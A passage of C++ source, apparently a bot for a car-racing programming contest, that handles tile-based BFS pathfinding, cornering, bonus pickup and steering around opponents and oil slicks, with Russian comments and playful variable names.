++i)\r\n //qqq[i] = ' ';\r\n //qqq[34] = 0;\r\n //visual.text(self.getX() + 120, self.getY() + 200, qqq);\r\n for (int i = 1; i < min(10, int(path.size())); ++i)\r\n visual.line(getCenter(path[i - 1].first), getCenter(path[i - 1].second), getCenter(path[i].first), getCenter(path[i].second), 0xff0000);\r\n 
visual.line(getCenter(pi), getCenter(pj), getCenter(ti), getCenter(tj), 0x00ff00);\r\n visual.line(getCenter(ti), getCenter(tj), getCenter(fi), getCenter(fj), 0x00ff00);\r\n visual.fillCircle(getCenter(ti), getCenter(tj), 10);\r\n visual.endPost();\r\n#endif\r\n //cout << \"END OF MOVE\\n\";\r\n //cout.flush();\r\n }\r\n\r\n else //надо было думать раньше\r\n {\r\n#define changed changedj \r\n#define distToNext distToNextij \r\n#define prevDistance prevDistanceij \r\n#define countOfFails countOfFailsj \r\n#define forceBack forceBackj \r\n#define forceRight forceRightj \r\n#define force forcej \r\n#define prevx prevxj \r\n#define currx currxj \r\n#define forceSlow forceSlowj \r\n#define globalFail globalFailj \r\n#define turn turnj \r\n#define power powerj \r\n#define init initj \r\n#define snake snakej \r\n#define drift driftj \r\n#define width widthj \r\n#define height heightj \r\n#define d dj \r\n#define pd pdj \r\n#define bad badj\r\n#define old oldj\r\n#define planB planBj \r\n#define visited visitedj\r\n#define once oncej\r\n#ifdef vis\r\n visual.beginPre();\r\n#endif\r\n tileSize = game.getTrackTileSize();\r\n auto a = world.getTilesXY();\r\n if (init)\r\n {\r\n FU = goforward;\r\n //мне стало лень думать\r\n if (world.getMapName() == \"map07\" || world.getMapName() == \"map08\" || world.getMapName() == \"map14\")\r\n FUUUUU = goforward;\r\n old.push_back({self.getX() / tileSize, self.getY() / tileSize});\r\n //cout << self.getX() << \" \" << self.getY() << \"\\n\";\r\n init = false;\r\n width = self.getWidth() / 2;\r\n height = self.getHeight() / 2;\r\n visited.resize(a.size());\r\n once.resize(a.size());\r\n for (int i = 0; i < visited.size(); ++i)\r\n visited[i].resize(a[0].size(), false),\r\n once[i].resize(a[0].size(), false);\r\n d = getDirectionByAngle(self.getAngle());\r\n pd = d;\r\n //cout << self.getAngle() << \" ANGLE \" << pd << \" \" << d << \"\\n\";\r\n#ifdef debug\r\n writeln(world.getWaypoints());\r\n#endif\r\n 
srand(game.getRandomSeed());\r\n }\r\n int waypointIndex = self.getNextWaypointIndex();\r\n int qx = self.getX() / tileSize;\r\n int qy = self.getY() / tileSize;\r\n int wx, wy;\r\n tie(wx, wy) = old.back();\r\n if (wx != qx || wy != qy)\r\n {\r\n //cout << wx << \" \" << wy << \" \" << qx << \" \" << qy << \" \" << pd << \" \" << d << \"\\n\";\r\n old[0] = {qx, qy};\r\n pd = d;\r\n d = directions[make_pair(qx - wx, qy - wy)];\r\n //int tqwer = getDirectionByAngle(self.getAngle());\r\n if (pd != d && a[self.getNextWaypointX()][self.getNextWaypointY()] != UNKNOWN && waypointIndex != 0)\r\n FU = FUUUUU;\r\n //if (tqwer != -1)\r\n //d = tqwer;\r\n //if (forceBack)\r\n //d = opposite(d);\r\n }\r\n\r\n prevx = currx;\r\n if (prevx == -1234)\r\n prevx = self.getX();\r\n currx = self.getX();\r\n if (currx - prevx != 0)\r\n changed = true;\r\n int ti = self.getNextWaypointX();\r\n int tj = self.getNextWaypointY();\r\n auto wp = world.getWaypoints();\r\n for (int i = 0; i < min(3, int(wp.size())); ++i)\r\n wp.push_back(wp[i]);\r\n int fi, fj, pi, pj;\r\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\r\n //if (waypointIndex < int(wp.size()) - 1)\r\n //{\r\n //int cx = int(self.getX() / tileSize);\r\n //int cy = int(self.getY() / tileSize);\r\n //int wx1 = wp[waypointIndex][0];\r\n //int wx2 = wp[waypointIndex + 1][0];\r\n //int wy1 = wp[waypointIndex][1];\r\n //int wy2 = wp[waypointIndex + 1][1];\r\n //if (\r\n //(cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\r\n //||\r\n //(cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\r\n //)\r\n //ti = wp[++waypointIndex][0],\r\n //tj = wp[waypointIndex][1];\r\n //if (waypointIndex + 1 < int(wp.size()))\r\n //fi = wp[waypointIndex + 1][0],\r\n //fj = wp[waypointIndex + 1][1];\r\n //}\r\n double targetX = getCenter(ti);\r\n double targetY = getCenter(tj);\r\n int si = self.getX() / tileSize;\r\n int sj = self.getY() / tileSize;\r\n pair<int, int> S = 
make_pair(si, sj);\r\n visited[si][sj] = true;\r\n vector<int> qwerqsdfgsdf = {si, sj};\r\n if (wp[max(0, self.getNextWaypointIndex() - 1)] == qwerqsdfgsdf && !once[si][sj])\r\n {\r\n once[si][sj] = true;\r\n for (int i = 0; i < visited.size(); ++i)\r\n for (int j = 0; j < visited[0].size(); ++j)\r\n visited[i][j] = false;\r\n }\r\n if (bad.find(S) == bad.end())\r\n bad.clear();\r\n int n = a.size();\r\n int m = a[0].size();\r\n auto ok = [&](int x, int N)\r\n {\r\n return x >= 0 && x < N;\r\n };\r\n\r\n auto getPath = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n#ifdef debug\r\n writeln(\"GET\", si, sj, tti, ttj, waypointIndex);\r\n#endif\r\n auto fffpath = [](int si, int sj, int u, int v, vector<vector<pair<int, int>>> prev)\r\n {\r\n vector<pair<int, int>> path;\r\n while (u != si || v != sj)\r\n path.push_back({u, v}),\r\n tie(u, v) = prev[u][v];\r\n path.push_back({si, sj});\r\n reverse(path.begin(), path.end());\r\n return path;\r\n };\r\n auto bfs = [&](int si, int sj, int tti, int ttj, int pd, int dd, vector<vector<vector<int>>> FUUUUU)\r\n {\r\n queue<vertex> q;\r\n q.push(vertex(si, sj, pd, dd));\r\n vector<vector<int>> d(n, vector<int>(m, 10000));\r\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\r\n d[si][sj] = 0;\r\n int u, v, prevD, prevprevD;\r\n while (q.size())\r\n {\r\n u = q.front().x;\r\n v = q.front().y;\r\n prevD = q.front().qd;\r\n prevprevD = q.front().qpd;\r\n q.pop();\r\n if (a[u][v] == UNKNOWN)\r\n continue;\r\n vector<int> dx;\r\n vector<int> dy;\r\n for (int i = 0; i < 4; ++i)\r\n dx.push_back(ddx[FUUUUU[prevprevD][prevD][i]]),\r\n dy.push_back(ddy[FUUUUU[prevprevD][prevD][i]]);\r\n for (int i = 0; i < 4; ++i)\r\n {\r\n auto iAmIdiot = directions[make_pair(dx[i], dy[i])];\r\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] != UNKNOWN && dir[a[u][v]][iAmIdiot] && (dx[i] != 0 || dy[i] != 0))\r\n {\r\n int isReverse = opposite(prevD, iAmIdiot);\r\n int isShpilka 
= opposite(prevprevD, iAmIdiot);\r\n int temp = d[u][v] + 1 + isShpilka * 3 + isReverse * 6;\r\n if (d[u + dx[i]][v + dy[i]] > temp)\r\n {\r\n d[u + dx[i]][v + dy[i]] = temp;\r\n prev[u + dx[i]][v + dy[i]] = {u, v};\r\n q.push(vertex(u + dx[i], v + dy[i], prevD, iAmIdiot));\r\n }\r\n }\r\n }\r\n }\r\n return make_pair(d, prev);\r\n };\r\n auto qqwerwer = bfs(si, sj, ti, tj, pd, d, FUUUUU);\r\n auto d = qqwerwer.first;\r\n int u, v;\r\n auto prev = qqwerwer.second;\r\n {\r\n u = tti;\r\n v = ttj;\r\n //ppp(d);\r\n int known = 10000;\r\n if (d[tti][ttj] != 10000)\r\n known = fffpath(si, sj, tti, ttj, bfs(si, sj, tti, ttj, pd, dd, FUUUUU).second).size();\r\n int ytrewq = d[tti][ttj] == 10000 || (known / 2 > (abs(si - tti) + abs(sj + ttj)));\r\n if (ytrewq)\r\n {\r\n int indexi = -1;\r\n int indexj = -1;\r\n int mn = 11234123;\r\n for (int i = 0; i < d.size(); ++i)\r\n for (int j = 0; j < d[0].size(); ++j)\r\n if (d[i][j] < 10000)\r\n {\r\n int length = fffpath(si, sj, i, j, bfs(si, sj, i, j, pd, dd, FUUUUU).second).size();\r\n bool hasGoodNeighbor = false;\r\n for (int dx = -1; dx < 2; ++dx)\r\n for (int dy = -1; dy < 2; ++dy)\r\n if (abs(dx + dy) == 1)\r\n hasGoodNeighbor |= ok(i + dx, a.size()) && ok(j + dy, a[0].size()) && a[i + dx][j + dy] == UNKNOWN;\r\n#ifdef vis\r\n if (hasGoodNeighbor)\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0xff00ff);\r\n else\r\n visual.fillCircle(getCenter(i), getCenter(j), 50, 0x00ffff);\r\n#endif\r\n int gamno = abs(i - tti) + abs(j - ttj) + length;\r\n if ((gamno < mn || (gamno == mn && abs(si - i) + abs(sj - j) < abs(si - indexi) + abs(sj - indexj))) && !visited[i][j] && hasGoodNeighbor)\r\n mn = gamno,\r\n indexi = i,\r\n indexj = j;\r\n }\r\n if (indexi == -1)\r\n cout << \"FAAAAAAAAAAAAAIL\\n\";\r\n else\r\n //cout << \"indices == \" << indexi << \" \" << indexj << \"\\n\",\r\n u = ti = indexi,\r\n v = tj = indexj,\r\n#ifdef vis\r\n visual.fillCircle(getCenter(tti), getCenter(ttj), 600, 0x555555),\r\n#endif\r\n targetX 
= getCenter(ti),\r\n targetY = getCenter(tj);\r\n }\r\n auto path = fffpath(si, sj, u, v, prev);\r\n if (ytrewq)\r\n path.push_back({-1, -1});\r\n return path;\r\n }\r\n return vector<pair<int, int>>(0);\r\n };\r\n vector<pair<int, int>> path;\r\n int qqq = ti;\r\n int www = tj;\r\n path = getPath(si, sj, ti, tj, pd, d, FU);\r\n for (int i = 0; i + 4 < min(7, int(path.size())); ++i)\r\n if (\r\n (\r\n isVertical(path[i + 0], path[i + 1]) &&\r\n isVertical(path[i + 2], path[i + 3]) &&\r\n isHorizontal(path[i + 0], path[i + 3]) &&\r\n isHorizontal(path[i + 1], path[i + 2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[i + 0], path[i + 1]) &&\r\n isHorizontal(path[i + 2], path[i + 3]) &&\r\n isVertical(path[i + 0], path[i + 3]) &&\r\n isVertical(path[i + 1], path[i + 2])\r\n )\r\n )\r\n {\r\n path = getPath(si, sj, qqq, www, pd, d, goforward);\r\n break;\r\n }\r\n cout << \"RAW PATH = \\n\" << path;\r\n int ai, aj, bi, bj, ci, cj, di, dj;\r\n auto banana = path.back();\r\n if (banana.first == -1)\r\n cout << \"banana\\n\";\r\n else\r\n cout << \"!banana\\n\";\r\n if (banana.first == -1)\r\n path.pop_back();\r\n else\r\n while (waypointIndex + 1 < int(wp.size()))\r\n {\r\n banana = path.back();\r\n if (banana.first == -1)\r\n path.pop_back();\r\n int t = 0;\r\n int y = 0;\r\n auto zxcv = path.back();\r\n auto asdf = path.back();\r\n auto qwer = path.back();\r\n if (path.size() >= 2)\r\n asdf = path[path.size() - 2];\r\n if (path.size() >= 3)\r\n zxcv = path[path.size() - 3];\r\n t = directions[make_pair(asdf.first - zxcv.first, asdf.second - zxcv.second)];\r\n y = directions[make_pair(qwer.first - asdf.first, qwer.second - asdf.second)];\r\n if (path.size() < 3)\r\n t = d;\r\n int q = wp[waypointIndex][0];\r\n int w = wp[waypointIndex][1];\r\n int e = wp[waypointIndex + 1][0];\r\n int r = wp[waypointIndex + 1][1];\r\n auto temp = getPath(q, w, e, r, t, y, FU);\r\n banana = temp.back();\r\n if (banana.first == -1)\r\n temp.pop_back();\r\n if (temp.size() <= 1)\r\n break;\r\n 
for (auto x : temp)\r\n path.push_back(x);\r\n waypointIndex++;\r\n }\r\n for (int i = 1; i < int(path.size()); ++i)\r\n if (path[i] == path[i - 1])\r\n path.erase(path.begin() + --i);\r\n //for (int i = 0; i + 5 < int(path.size()); ++i)\r\n //{\r\n //auto s = path[i];\r\n //auto d = path[i + 1];\r\n //auto f = path[i + 2];\r\n //auto g = path[i + 3];\r\n //auto h = path[i + 4];\r\n //auto j = path[i + 5];\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //cout << \"EPIC WIN\\n\",\r\n //path[i + 2] = {d.first + 1, d.second};\r\n //if (isDownTo(s, d) && isDownTo(d, f) && isLeftTo(f, g) && isLeftTo(g, h) && !isDownTo(h, j) && dir[a[d.first][d.second]][RIGHT] && dir[a[g.first][g.second]][DOWN])\r\n //path[i + 2] = {d.first + 1, d.second};\r\n\r\n //}\r\n auto checkBonus = path;\r\n for (int i = 1; i < int(path.size()) - 1; ++i)\r\n if ((abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1) || path[i - 1] == path[i + 1])\r\n {\r\n#ifdef debug\r\n if (debug)\r\n {\r\n vector<string> xxx(m);\r\n for (int i = 0; i < m; ++i)\r\n for (int j = 0; j < n; ++j)\r\n xxx[i].push_back('.');\r\n for (int i = 0; i < path.size(); ++i)\r\n xxx[path[i].second][path[i].first] = i + 48;\r\n xxx[sj][si] = 'S';\r\n xxx[path[i].second][path[i].first] = 'X';\r\n xxx[tj][ti] = 'F';\r\n //ppp(d);\r\n //writeln();\r\n //writeln(xxx);\r\n //writeln();\r\n }\r\n#endif\r\n //fi = ti;\r\n //fj = tj;\r\n tie(ti, tj) = path[i];\r\n targetX = getCenter(path[i].first);//(path[i].first + 0.5) * tileSize;\r\n targetY = getCenter(path[i].second);//(path[i].second + 0.5) * tileSize;\r\n break;\r\n }\r\n#ifdef debug\r\n wr(path);\r\n cout.flush();\r\n#endif\r\n if (path.size() >= 3)\r\n {\r\n tie(ai, aj) = path[0];\r\n tie(bi, bj) = path[1];\r\n tie(ci, cj) = path[2];\r\n }\r\n if (path.size() >= 4) //SNAKE\r\n {\r\n tie(di, dj) = 
path[3];\r\n snake = true;\r\n if (\r\n (ai + 1 == ci && aj - 1 == cj && bi + 1 == di && bj - 1 == dj)\r\n || (ai - 1 == ci && aj + 1 == cj && bi - 1 == di && bj + 1 == dj)\r\n || (ai + 1 == ci && aj + 1 == cj && bi + 1 == di && bj + 1 == dj)\r\n || (ai - 1 == ci && aj - 1 == cj && bi - 1 == di && bj - 1 == dj)\r\n )\r\n tie(targetX, targetY) = getXX(path[1], path[2]);\r\n else\r\n {\r\n drift = true;\r\n snake = false;\r\n if (\r\n (\r\n isVertical(path[0], path[1]) &&\r\n isVertical(path[2], path[3]) &&\r\n isHorizontal(path[0], path[3]) &&\r\n isHorizontal(path[1], path[2])\r\n )\r\n ||\r\n (\r\n isHorizontal(path[0], path[1]) &&\r\n isHorizontal(path[2], path[3]) &&\r\n isVertical(path[0], path[3]) &&\r\n isVertical(path[1], path[2])\r\n )\r\n )\r\n {\r\n bad.insert(path[1]);\r\n if (d != directions[make_pair(path[1].first - path[0].first, path[1].second - path[0].second)])\r\n bad.insert(path[0]);\r\n bad.insert(path[2]);\r\n //if (self.getDistanceTo(getCenter(path[1].first), getCenter(path[1].second)) < tileSize)\r\n tie(targetX, targetY) = getCorner(path[0], path[1], path[2]);\r\n }\r\n else\r\n drift = false;\r\n }\r\n } else\r\n drift = false,\r\n snake = false;\r\n double temp = self.getDistanceTo(targetX, targetY);\r\n double temp2 = temp / tileSize;\r\n prevDistance = distToNext;\r\n distToNext = temp;\r\n auto interpolation = [&](double x)\r\n {\r\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 0.2;//идеально при малой скорости\r\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\r\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1)\r\n + 0.2; 
//на скорости влезает, но задевает угол ~-2\r\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\r\n };\r\n double MAAAAAGIC = interpolation(temp2);\r\n if (temp2 > 2)\r\n MAAAAAGIC = -0.25;\r\n if (temp2 < 0.6)\r\n MAAAAAGIC = interpolation(0.6);\r\n bool found = false;\r\n for (int i = 0; i < int(path.size()); ++i)\r\n if (path[i].first == ti && path[i].second == tj)\r\n {\r\n pi = path[max(0, i - 1)].first;\r\n pj = path[max(0, i - 1)].second;\r\n fi = path[min(int(path.size()) - 1, i + 1)].first;\r\n fj = path[min(int(path.size()) - 1, i + 1)].second;\r\n found = true;\r\n break;\r\n }\r\n double nextWaypointX = targetX;\r\n double nextWaypointY = targetY;\r\n\r\n double cornerTileOffset = MAAAAAGIC * tileSize;\r\n //auto pathtitj = getPath(ti, tj, fi, fj);\r\n //if (pathtitj.size() >= 2)\r\n //fi = pathtitj[1].first,\r\n //fj = pathtitj[1].second;\r\n //else\r\n //fi = ti,\r\n //fj = tj;\r\n#ifdef debug\r\n wr(si, sj, pi, pj, ti, tj, fi, fj);\r\n cout.flush();\r\n //writeln(pathtitj);\r\n //writeln();\r\n#endif\r\n auto changeCoords = [&](int i, int j) {\r\n if (snake || drift)\r\n return;\r\n if (pj == tj)\r\n swap(pi, fi),\r\n swap(pj, fj);\r\n switch (a[i][j]) \r\n {\r\n case LEFT_TOP_CORNER:\r\n lt:\r\n //a[i][j] = LEFT_TOP_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case RIGHT_TOP_CORNER:\r\n rt:\r\n //a[i][j] = RIGHT_TOP_CORNER;\r\n nextWaypointX -= cornerTileOffset;\r\n nextWaypointY += cornerTileOffset;\r\n break;\r\n case LEFT_BOTTOM_CORNER:\r\n lb:\r\n //a[i][j] = LEFT_BOTTOM_CORNER;\r\n nextWaypointX += cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case RIGHT_BOTTOM_CORNER:\r\n rb:\r\n //a[i][j] = RIGHT_BOTTOM_CORNER;\r\n nextWaypointX -= 
cornerTileOffset;\r\n nextWaypointY -= cornerTileOffset;\r\n break;\r\n case TOP_HEADED_T:\r\n th:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rb, lb);\r\n break;\r\n case BOTTOM_HEADED_T:\r\n bh:\r\n if (pj == tj && pj == fj);\r\n else\r\n go(fi + 1 == ti, rt, lt);\r\n break;\r\n case RIGHT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, lb, lt);\r\n break;\r\n case LEFT_HEADED_T:\r\n if (pi == ti && pi == fi);\r\n else\r\n go(pj + 1 == tj, rb, rt);\r\n break;\r\n case CROSSROADS:\r\n if (pi == ti && pi == fi);\r\n else if (pj == tj && pj == fj);\r\n else go(pj + 1 == tj, th, bh);\r\n default:\r\n break;\r\n }\r\n };\r\n changeCoords(ti, tj);\r\n bool B = false;\r\n double bonusMin = 1000000;\r\n Bonus bonus;\r\n if (!snake && self.getRemainingNitroTicks() == 0 && !drift)\r\n for (Bonus b : world.getBonuses())\r\n if (self.getDistanceTo(b) < distToNext)\r\n if ((b.getDistanceTo(targetX, targetY) > tileSize * 2 && fabs(self.getAngleTo(b)) < PI / 27) && fabs(self.getAngleTo(targetX, targetY) < PI / 36) && self.getDistanceTo(b) > tileSize)\r\n {\r\n pair<int, int> bbb = {b.getX() / tileSize, b.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == bbb)\r\n {\r\n B = true;\r\n if (bonusMin > self.getDistanceTo(b))\r\n bonus = b,\r\n bonusMin = self.getDistanceTo(b);\r\n }\r\n }\r\n }\r\n if (B)\r\n {\r\n pair<int, int> bbb = {bonus.getX() / tileSize, bonus.getY() / tileSize};\r\n nextWaypointX = bonus.getX();\r\n nextWaypointY = bonus.getY();\r\n nextWaypointX = min(nextWaypointX, get(bbb.first + 1) - height - bonus.getWidth() / 2 - 78);\r\n nextWaypointX = max(nextWaypointX, get(bbb.first) + height + bonus.getWidth() / 2 + 78);\r\n nextWaypointY = min(nextWaypointY, get(bbb.second + 1) - height - bonus.getHeight() / 2 - 78);\r\n nextWaypointY = max(nextWaypointY, get(bbb.second) + height + bonus.getHeight() / 2 + 78);\r\n }\r\n if 
(is32(path))\r\n tie(nextWaypointX, nextWaypointY) = make_pair(getCenter(path[2].first), getCenter(path[2].second));\r\n\r\n auto cars = world.getCars();\r\n sort(cars.begin(), cars.end(), [&self](const Car& aaa, const Car& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (Car car : world.getCars())\r\n if (!car.isFinishedTrack() && !car.isTeammate())\r\n if (hypot(car.getSpeedX(), car.getSpeedY()) * 1.2 < speedModule || fabs(car.getAngleTo(self)) < PI / 2 || speedModule < 10 && world.getTick() > 300)\r\n {\r\n pair<int, int> ccc = {car.getX() / tileSize, car.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && (self.getDistanceTo(car) > tileSize || speedModule < 10))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= car.getX() || targetX >= self.getX() && self.getX() >= car.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = car.getY() - height - 15 - car.getWidth();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = car.getY() + height + 15 + car.getWidth();\r\n double cgy = car.getY();\r\n double dist1 = self.getDistanceTo(car.getX(), lower) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(car.getX(), lower2) + hypot(nextWaypointX - car.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(car.getX(), upper) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(car.getX(), upper2) + hypot(nextWaypointX - car.getX(), nextWaypointY - upper2);\r\n nextWaypointX = car.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= car.getY() || targetY >= self.getY() && self.getY() >= car.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = car.getX() - height - 15 - car.getWidth();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = car.getX() + height + 15 + car.getWidth();\r\n double cgy = car.getX();\r\n double dist1 = self.getDistanceTo(car.getY(), lower) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(car.getY(), lower2) + hypot(nextWaypointY - car.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(car.getY(), upper) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(car.getY(), upper2) + hypot(nextWaypointY - car.getY(), nextWaypointX - upper2);\r\n nextWaypointY = car.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n auto os = world.getOilSlicks();\r\n sort(os.begin(), os.end(), [&self](const OilSlick& aaa, const OilSlick& bbb) { return self.getDistanceTo(aaa) < self.getDistanceTo(bbb);});\r\n for (auto o : os)\r\n {\r\n pair<int, int> ccc = {o.getX() / tileSize, o.getY() / tileSize};\r\n pair<int, int> qwerty = {ti, tj};\r\n int index = 0;\r\n for (auto point : path)\r\n {\r\n if (point == qwerty)\r\n break;\r\n if (point == ccc && index + 1 < int(path.size()) && self.getDistanceTo(o) > tileSize && self.getDistanceTo(o) < self.getDistanceTo(nextWaypointX, nextWaypointY))\r\n {\r\n if (isHorizontal(point, path[index + 1]))\r\n {\r\n if (targetX <= self.getX() && self.getX() <= o.getX() || targetX >= self.getX() && self.getX() >= o.getX())\r\n continue;\r\n double lower = get(ccc.second) + 80 + height + 15;\r\n double lower2 = o.getY() - height - 15 - o.getRadius();\r\n double upper = get(ccc.second + 1) - 80 - height - 15;\r\n double upper2 = o.getY() + height + 15 + o.getRadius();\r\n double cgy = o.getY();\r\n double dist1 = self.getDistanceTo(o.getX(), lower) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower);\r\n double dist2 = self.getDistanceTo(o.getX(), lower2) + hypot(nextWaypointX - o.getX(), nextWaypointY - lower2);\r\n double dist3 = self.getDistanceTo(o.getX(), upper) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper);\r\n double dist4 = self.getDistanceTo(o.getX(), upper2) + hypot(nextWaypointX - o.getX(), nextWaypointY - upper2);\r\n nextWaypointX = o.getX();\r\n nextWaypointY = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n if (isVertical(point, path[index + 1]))\r\n {\r\n if (targetY <= self.getY() && self.getY() <= o.getY() || targetY >= self.getY() && self.getY() >= o.getY())\r\n continue;\r\n double lower = get(ccc.first) + 80 + height + 15;\r\n double lower2 = o.getX() - height - 15 - o.getRadius();\r\n double upper = get(ccc.first + 1) - 80 - height - 15;\r\n double upper2 = o.getX() + height + 15 + o.getRadius();\r\n double cgy = o.getX();\r\n double dist1 = self.getDistanceTo(o.getY(), lower) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower);\r\n double dist2 = self.getDistanceTo(o.getY(), lower2) + hypot(nextWaypointY - o.getY(), nextWaypointX - lower2);\r\n double dist3 = self.getDistanceTo(o.getY(), upper) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper);\r\n double dist4 = self.getDistanceTo(o.getY(), upper2) + hypot(nextWaypointY - o.getY(), nextWaypointX - upper2);\r\n nextWaypointY = o.getY();\r\n nextWaypointX = (cgy - lower > upper - cgy) ? (dist1 < dist2 ? lower : lower2) : (dist3 < dist4 ? 
upper : upper2);\r\n }\r\n break;\r\n }\r\n ++index;\r\n }\r\n\r\n }\r\n\r\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\r\n //double check = self.getAngleTo(getCenter(ti), getCenter(tj));\r\n //if ((fabs(check - PI) < PI / 6 || fabs(check + PI) < PI / 6) && planB == 0)\r\n //planB = PLANB,\r\n //power *= -1;\r\n //if (fabs(check) < PI / 3 && planB)\r\n //power *= -1,\r\n //planB = 0;\r\n auto getTurn = [&](double d)\r\n {\r\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\r\n };\r\n if (forceBack)\r\n {\r\n forceBack--;\r\n if (forceBack == 0)\r\n {\r\n power *= -1;\r\n forceRight = FORCE_RIGHT;\r\n turn *= -1;\r\n }\r\n }\r\n\r\n else if (forceRight)\r\n {\r\n if (forceRight > FORCE_RIGHT - BREAK)\r\n move.setBrake(true);\r\n forceRight--;\r\n if (forceRight == 0)\r\n force = FORCE;\r\n } \r\n if (forceBack == 0 && forceRight == 0)\r\n {\r\n if (changed && fabs(prevDistance - distToNext) < eps)\r\n {\r\n countOfFails++;\r\n {\r\n if (countOfFails > COUNT_OF_FAILS)\r\n {\r\n globalFail++;\r\n countOfFails = 0;\r\n //if (planB)\r\n //planB = 0,\r\n //power *= -1,\r\n //forceRight = FORCE_RIGHT;\r\n //else\r\n forceBack = FORCE_BACK;\r\n turn = getTurn(32);\r\n if (isCorner(a[si][sj]))\r\n {\r\n //cout << \"CORNER\";\r\n turn = turn > 0 ? 1 : -1;\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"GLOBAL_FAIL\",\r\n turn *= -1;\r\n }\r\n else\r\n if (globalFail > GLOBAL_FAIL)\r\n //cout << \"NOT CORNER GLOBAL_FAIL\",\r\n turn = turn > 0 ? 1 : -1;\r\n turn *= -1;\r\n power *= -1;\r\n }\r\n }\r\n //else\r\n //if (countOfFails > COUNT_OF_FAILS / 5)\r\n //{\r\n //forceRight = 0;\r\n //force = 0;\r\n //countOfFails = COUNT_OF_FAILS;\r\n //}\r\n }\r\n else\r\n {\r\n if (force)\r\n force--;\r\n forceSlow = path.size() <= 4 ? 
